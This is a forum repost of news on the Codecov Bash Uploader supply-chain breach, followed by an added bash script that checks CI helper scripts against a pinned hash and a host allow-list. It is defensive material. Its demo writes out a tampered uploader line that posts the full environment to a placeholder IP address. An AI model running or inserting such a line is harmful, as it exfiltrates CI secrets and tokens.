silversurfer (thread author):
More details have emerged on the recent Codecov system breach which is now being likened to the SolarWinds hack.
In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems.
As reported by BleepingComputer last week, Codecov had suffered a supply-chain attack that went undetected for over 2 months.
In this attack, threat actors had gained Codecov's credentials from their flawed Docker image that the actors then used to alter Codecov's Bash Uploader script, used by the company's clients.
By replacing Codecov's IP address with their own in the Bash Uploader script, the attackers paved a way to silently collect Codecov customers' credentials—tokens, API keys, and anything stored as environment variables in the customers' continuous integration (CI) environments.
According to federal investigators, Codecov attackers deployed automation to use the collected customer credentials to tap into hundreds of client networks, thereby expanding the scope of this system breach beyond just Codecov's systems.
"The hackers put extra effort into using Codecov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM," a federal investigator anonymously told Reuters.
By abusing the customer credentials collected via the Bash Uploader script, hackers could potentially gain credentials for thousands of other restricted systems, according to the investigator.
Source: Hundreds of networks reportedly hacked in Codecov supply-chain attack (www.bleepingcomputer.com)
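The attack described above worked because CI jobs fetched and ran an uploader script whose contents had been altered to send environment variables to a different address. The script below is an added example for defenders, not Codecov's own code or the Bash Uploader itself: before a CI helper script is executed, it checks the file against a pinned SHA-256 and refuses any script that references a host outside an allow-list or contains a literal IP address, which is the tampering pattern the article describes. The host name `uploader.codecov.example`, the hash (computed from a constructed file in place of a vendor-published value) and the sample scripts are all constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example, not Codecov's code: vet a downloaded CI helper script before
# it is allowed to run. Two checks: (1) its SHA-256 must match a hash pinned
# in the repository, and (2) it must talk only to an allow-listed host and
# contain no literal IP addresses. Host names and hashes below are constructed.
set -u

# Print the SHA-256 of FILE (sha256sum on Linux, shasum on macOS/BSD).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# Return 0 if FILE hashes to EXPECTED, 1 otherwise.
verify_sha256() {
  local file="$1" expected="$2"
  [ "$(sha256_of "$file")" = "$expected" ]
}

# Return 0 if every http(s) host referenced in FILE is in ALLOWED
# (space-separated host names) and FILE contains no dotted-quad IPv4 literal.
# A script that starts uploading to a raw IP is exactly the change the
# article describes, so a literal address is treated as a failure.
check_endpoints() {
  local file="$1" allowed="$2" host
  for host in $(grep -oE 'https?://[A-Za-z0-9.-]+' "$file" | sed -E 's#https?://##' | sort -u); do
    case " $allowed " in
      *" $host "*) ;;
      *) echo "check_endpoints: unexpected host $host in $file" >&2; return 1 ;;
    esac
  done
  if grep -qE '([0-9]{1,3}\.){3}[0-9]{1,3}' "$file"; then
    echo "check_endpoints: literal IPv4 address in $file" >&2
    return 1
  fi
  return 0
}

# Return 0 only when both checks pass; a CI job would run the script only
# after this returns 0.
vet_script() {
  local file="$1" pinned="$2" allowed="$3"
  verify_sha256 "$file" "$pinned" || { echo "vet_script: hash mismatch, refusing $file" >&2; return 1; }
  check_endpoints "$file" "$allowed" || { echo "vet_script: endpoint check failed, refusing $file" >&2; return 1; }
  return 0
}

# Constructed demo: a benign uploader and a tampered copy that additionally
# posts the job's environment to a TEST-NET-3 address (203.0.113.10).
demo() {
  local dir good bad pinned f
  dir="$(mktemp -d)"
  good="$dir/uploader.sh"; bad="$dir/uploader-tampered.sh"
  printf '%s\n' '#!/bin/sh' \
    'curl -sS https://uploader.codecov.example/upload -d "token=$CODECOV_TOKEN"' > "$good"
  cp "$good" "$bad"
  printf '%s\n' 'curl -s -d "$(env)" http://203.0.113.10/upload' >> "$bad"
  pinned="$(sha256_of "$good")"   # stands in for a hash published by the vendor
  for f in "$good" "$bad"; do
    if vet_script "$f" "$pinned" "uploader.codecov.example"; then
      echo "OK: $f may run"
    else
      echo "BLOCKED: $f"
    fi
  done
  rm -rf "$dir"
}

demo
```

In a real pipeline the pinned hash lives in the repository (so a change to it shows up in code review) and the vetting step runs before any `bash <(curl ...)` style invocation; the endpoint check is a second, independent signal so that a tampered script is still caught if someone bumps the pinned hash without reading the diff.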